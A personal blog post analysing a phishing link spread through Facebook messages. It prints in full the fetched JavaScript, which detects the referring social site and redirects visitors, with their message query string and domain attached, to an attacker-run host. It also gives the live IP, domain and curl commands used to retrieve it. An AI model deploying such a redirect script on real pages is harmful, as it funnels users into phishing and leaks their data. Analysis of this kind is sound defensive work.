I was peacefully watching videos on Hulu when I received a mysterious email from one of my friends on Facebook. The message contents contained something that the individual would probably never say to me and was followed by a link. I immediately knew that this might be a part of some phishing scam. Knowing that others who were also sent the message might not realize the danger, I immediately told everyone not to click the link.

Now that the chance of others being taken advantage by this scam was greatly reduced, I could begin my investigation as to what sort of information the phishers were gathering. I fired up a terminal and went to work.

$ curl http://198.64.140.97/funnymovie/

nzmkuewnjpew hvsigccd
<script src="3jsum37jmq1z.js"></script>
uvqztdlft egjykgmuvrrzzmr

Well that seemed odd. I didn’t understand the random characters, but the script tag made it completely obvious that they were up to no good. Well, lets see what it does.
$ curl http://198.64.140.97/funnymovie/3jsum37jmq1z.js

// KROTEG
var abc1 = 'http://r-d-cgpay-090709.com/go/';    // 1
var abc2 = 'http://r-d-cgpay-090709.com/go/';
var ss = '' + location.search; // 2
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com',  abc+'fb.php'],
['tagged.com',    abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com',   abc+'ms.php'],
['msplinks.com',  abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com',     abc+'fu.php'],
['twitter.com',   abc+'tw.php'],
['hi5.com',       abc+'hi5.php'],
['bebo.com',      abc+'be.php']
]; // 3
var s = '' + document.referrer, r = false;
for (var i = 0; i < redirects.length; i ++) {
if ((s.indexOf(redirects[i][0]) != -1)) { // 4
     var redir=redirects[i][1] + location.search;
     if ((location.search).length>0) redir=redir+'&amp;amp;amp;amp;amp;domain='+location.host; else redir=redir+'?domain='+location.host;
     location.href = redir;  //5
     r = true;
     break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;

This find was definitely interesting. Let’s go step by step and figure out what they are doing.

First I wanted to know about the site behind all of this http://r-d-cgpay-090709.com. Their IP address and approximate location could be determined by a simple traceroute.

$ traceroute r-d-cgpay-090709.com

traceroute to r-d-cgpay-090709.com (61.235.117.71), 64 hops max, 40 byte packets
 1  192.168.1.1 (192.168.1.1)  9.331 ms  1.834 ms  2.213 ms
 2  * * *
 3  te-3-4-ur04.santaclara.ca.sfba.comcast.net (68.85.190.253)  11.358 ms  24.434 ms  16.903 ms
 4  be-70-ar01.oakland.ca.sfba.comcast.net (68.85.154.149)  28.483 ms  35.249 ms  16.347 ms
 5  pos-0-6-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.91.225)  22.579 ms  17.279 ms  14.378 ms
 6  pos-0-9-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.181)  20.288 ms  30.457 ms  27.989 ms
 7  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.54)  23.593 ms  21.716 ms  20.496 ms
 8  tenge13-3.br02.sjo01.pccwbtn.net (63.218.179.25)  23.699 ms  19.488 ms  28.077 ms
 9  china-tietong.pos6-2.cr02.hkg04.pccwbtn.net (63.218.252.10)  414.604 ms  395.548 ms  397.325 ms
10  61.237.119.81 (61.237.119.81)  463.588 ms  414.780 ms  397.284 ms
11  61.237.112.74 (61.237.112.74)  399.872 ms * *
12  222.50.127.218 (222.50.127.218)  434.857 ms  415.261 ms  407.054 ms
13  61.235.116.130 (61.235.116.130)  402.744 ms  424.623 ms  408.174 ms
14  61.235.117.71 (61.235.117.71)  409.368 ms  391.156 ms  397.808 ms

It appeared as if this IP address was from somewhere in China according to the line containing “china-tietong”. I was then curious if they had a pattern of dubious behavior. I entered their IP address into Google. According to the search results, McAfee identifies this IP as malicious as it has been responsible for malware in the past. Now that I knew who I was dealing with, it was time to figure out what type of information they were getting from people. I will talk about lines that I have commented in the code.

  1. This is the URL that they are using to capture the incoming information.
  2. In Javascript, location.search is the string from the URL query section (everything after and including the ?). So in the case of Facebook, it would appear to be something like this: ?t=XXXXXXXXXXXXX&mbox_pos=Y (where X is the message ID).
  3. This part of the code creates a url in the form of http://r-d-cgpay-090709.com/go/fb.php where the final page differs by each service the user originates from.
  4. The for loop in this part searches through the redirect array for the corresponding originating site. Once it has found the site it creates a url in the form: http://r-d-cgpay-090709.com/go/fb.php?t=XXXXXXXXXXXXX&mbox_pos=Y&domain=facebook.com
  5. The browser is sent to this url so that the attackers can gain information about the user that clicked on the link. The site does not send a reply back when visiting this url.

However, this information they are collecting does not seem very interesting. They were able to obtain the message that the url was posted on along with the originating site. Maybe it could be a stepping stone for a larger attack? Could they be gathering information about which social network sites are most vulnerable to a phishing attack? Did I simply miss something? Any insightful comments on this potential attack are welcomed!